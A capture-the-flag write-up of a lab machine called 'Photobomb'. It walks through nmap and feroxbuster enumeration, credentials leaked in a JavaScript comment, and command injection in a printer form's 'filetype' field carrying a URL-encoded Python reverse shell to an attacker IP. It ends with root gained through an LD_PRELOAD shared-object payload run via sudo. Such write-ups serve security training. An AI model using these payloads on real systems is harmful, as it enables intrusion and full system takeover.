Photobomb

From RCATs

Nmap scan with default script and version enumeration.

Starting Nmap 7.93 ( https://nmap.org ) at 2022-11-29 15:43 MST
Nmap scan report for 10.10.11.182
Host is up (0.068s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   3072 e22473bbfbdf5cb520b66876748ab58d (RSA)
|   256 04e3ac6e184e1b7effac4fe39dd21bae (ECDSA)
|_  256 20e05d8cba71f08c3a1819f24011d29e (ED25519)
80/tcp open  http    nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://photobomb.htb/
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.67 seconds

FeroxBuster to find more pages. only find /printer. This is also linked on main page.

β”Œβ”€β”€[Target:Photobomb🌐IP:10.10.11.182πŸš€βš”οΈAttacker:SourMilkπŸ“‘IP:10.10.10.10πŸ†Prize:20 points]
└──╼[πŸ‘Ύ]~ $ feroxbuster --url http://photobomb.htb -w /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt

 ___  ___  __   __     __      __         __   ___
|__  |__  |__) |__) | /  `    /  \ \_/ | |  \ |__
|    |___ |  \ |  \ | \__,    \__/ / \ | |__/ |___
by Ben "epi" Risher πŸ€“                 ver: 2.7.1
───────────────────────────┬──────────────────────
 🎯  Target Url            β”‚ http://photobomb.htb
 πŸš€  Threads               β”‚ 50
 πŸ“–  Wordlist              β”‚ /usr/share/payloads/SecLists/Discovery/Web-Content/raft-medium-directories.txt
 πŸ‘Œ  Status Codes          β”‚ [200, 204, 301, 302, 307, 308, 401, 403, 405, 500]
 πŸ’₯  Timeout (secs)        β”‚ 7
 🦑  User-Agent            β”‚ feroxbuster/2.7.1
 🏁  HTTP methods          β”‚ [GET]
 πŸ”ƒ  Recursion Depth       β”‚ 4
 πŸŽ‰  New Version Available β”‚ https://github.com/epi052/feroxbuster/releases/latest
───────────────────────────┴──────────────────────
 🏁  Press [ENTER] to use the Scan Management Menuβ„’
──────────────────────────────────────────────────
200      GET       22l       95w      843c http://photobomb.htb/
401      GET        7l       12w      188c http://photobomb.htb/printer
401      GET        7l       12w      188c http://photobomb.htb/printers
401      GET        7l       12w      188c http://photobomb.htb/printer_friendly
401      GET        7l       12w      188c http://photobomb.htb/printerfriendly
401      GET        7l       12w      188c http://photobomb.htb/printer-friendly
[####################] - 2m     60000/60000   0s      found:6       errors:0
[####################] - 2m     30000/30000   248/s   http://photobomb.htb
[####################] - 2m     30000/30000   248/s   http://photobomb.htb/

Inspect photobomb.js on main page. Find Credentials. Use those to log into printer

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {
    document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0...:...Mb!@photobomb.htb/printer');
  }
}
window.onload = init;

Capture download of file.

POST /printer HTTP/1.1

Host: photobomb.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 79

Origin: http://photobomb.htb

Authorization: Basic cEgwdDA6YjBNYiE=

Connection: close

Referer: http://photobomb.htb/printer

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1



photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png&dimensions=3000x2000

We find filetype is injectable. Add python reverse shell and URL encode.

POST /printer HTTP/1.1

Host: photobomb.htb

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Content-Type: application/x-www-form-urlencoded

Content-Length: 79

Origin: http://photobomb.htb

Authorization: Basic cEgwdDA6YjBNYiE=

Connection: close

Referer: http://photobomb.htb/printer

Upgrade-Insecure-Requests: 1

DNT: 1

Sec-GPC: 1



photo=almas-salakhov-VK7TCqcZTlw-unsplash.jpg&filetype=png;python3%20-c%20%27import%20socket%2Csubprocess%2Cos%3Bs%3Dsocket.socket%28socket.AF_INET%2Csocket.SOCK_STREAM%29%3Bs.connect%28%28%2210.10.10.10%22%2C4444%29%29%3Bos.dup2%28s.fileno%28%29%2C0%29%3Bos.dup2%28s.fileno%28%29%2C1%29%3Bos.dup2%28s.fileno%28%29%2C2%29%3Bp%3Dsubprocess.call%28%5B%22%2Fbin%2Fsh%22%2C%22-i%22%5D%29%3B%27&dimensions=3000x2000

Boom Shell

└──╼[πŸ‘Ύ]~ $ nc -nlvp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.11.182 47022
/bin/sh: 0: can't access tty; job control turned off
$ ls
log
photobomb.sh
public
resized_images
server.rb
syntaxhighlight_images
$ id
uid=1000(wizard) gid=1000(wizard) groups=1000(wizard)

Check sudo -l. cleanup.sh requires no password.

$ sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

Do some Reading about this Check secure_path and see /usr/bin instead of /bin/sh from article. Create sour.c

#include <stdio.h>  
#include <sys/types.h>  
#include <stdlib.h>  
void _init() {  
        unsetenv("LD_PRELOAD");  
        setgid(0);  
        setuid(0);  
        system("/usr/bin/bash");  
}

Compile

gcc -fPIC -shared -o sour.so sour.c -nostartfiles

Upload and execute

$ pwd
/tmp
$ sudo LD_PRELOAD=/tmp/sour.so /opt/cleanup.sh
id
uid=0(root) gid=0(root) groups=0(root)

Done!